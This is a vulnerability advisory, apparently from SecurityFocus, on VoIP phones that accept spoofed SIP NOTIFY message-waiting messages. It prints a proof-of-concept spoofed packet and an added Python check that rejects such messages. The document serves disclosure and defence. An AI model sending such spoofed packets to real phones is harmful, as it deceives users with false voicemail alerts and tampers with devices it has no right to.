Multiple Vendor VoIP Phones Spoofed SIP Status Message Handling Weakness

An exploit is not required.

The following proof of concept example is available:
UDP-Message from Attacker to Victim

Session Initiation Protocol
Request-Line: NOTIFY sip:login@10.1.1.2 SIP/2.0
Message Header
Via: SIP/2.0/UDP 15.1.1.12:5060;branch=000000000000000
From: "asterisk" <sip:asterisk@10.1.1.1>;tag=000000000
To: <sip:login@10.1.1.2>
Contact: <sip:asterisk@10.1.1.1>
Call-ID: 00000000000000@10.1.1.1
CSeq: 102 NOTIFY
User-Agent: Asterisk PBX
Event: message-summary
Content-Type: application/simple-message-summary
Content-Length: 37
Message body
Messages-Waiting: yes\n
Voicemail: 3/2\n
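
A receiver-side check for the message above, as an added example that is not part of the original advisory or any vendor's code. It assumes the phone knows the address of its configured proxy and tracks the dialogs it created itself with SUBSCRIBE; `check_mwi_notify`, `trusted_proxies` and `subscriptions` are hypothetical names.

```python
import re

# Constructed sample: the NOTIFY shown in the advisory, as raw SIP text.
SPOOFED_NOTIFY = (
    "NOTIFY sip:login@10.1.1.2 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 15.1.1.12:5060;branch=000000000000000\r\n"
    'From: "asterisk" <sip:asterisk@10.1.1.1>;tag=000000000\r\n'
    "To: <sip:login@10.1.1.2>\r\n"
    "Contact: <sip:asterisk@10.1.1.1>\r\n"
    "Call-ID: 00000000000000@10.1.1.1\r\n"
    "CSeq: 102 NOTIFY\r\n"
    "User-Agent: Asterisk PBX\r\n"
    "Event: message-summary\r\n"
    "Content-Type: application/simple-message-summary\r\n"
    "Content-Length: 37\r\n"
    "\r\n"
    "Messages-Waiting: yes\nVoicemail: 3/2\n"
)

def parse_sip(raw):
    """Split a raw SIP message into request line, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def check_mwi_notify(raw, src_ip, trusted_proxies, subscriptions):
    """Return reasons to reject a message-summary NOTIFY (empty list = accept).

    trusted_proxies: IPs of the configured registrar/proxy (assumption).
    subscriptions: set of (Call-ID, From tag) pairs for dialogs the phone
    itself established with SUBSCRIBE (assumption).
    """
    request_line, h, _ = parse_sip(raw)
    if not request_line.startswith("NOTIFY ") or h.get("event") != "message-summary":
        return []  # not the message type this check covers
    reasons = []
    if src_ip not in trusted_proxies:
        reasons.append("source is not a configured proxy")
    tag = re.search(r";tag=([^;\s]+)", h.get("from", ""))
    dialog = (h.get("call-id"), tag.group(1) if tag else None)
    if dialog not in subscriptions:
        reasons.append("no matching subscription dialog")
    return reasons
```

A source-address test alone is weak over UDP, so the dialog match is the stronger of the two checks.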

A proof of concept (SIP_NOTIFY_POC.pl) has been supplied by <DrFrancky@securax.org>.

Tobias Glemser <tglemser@tele-consulting.com> has provided an exploit (snf.zip) as well:


 

Copyright 2010, SecurityFocus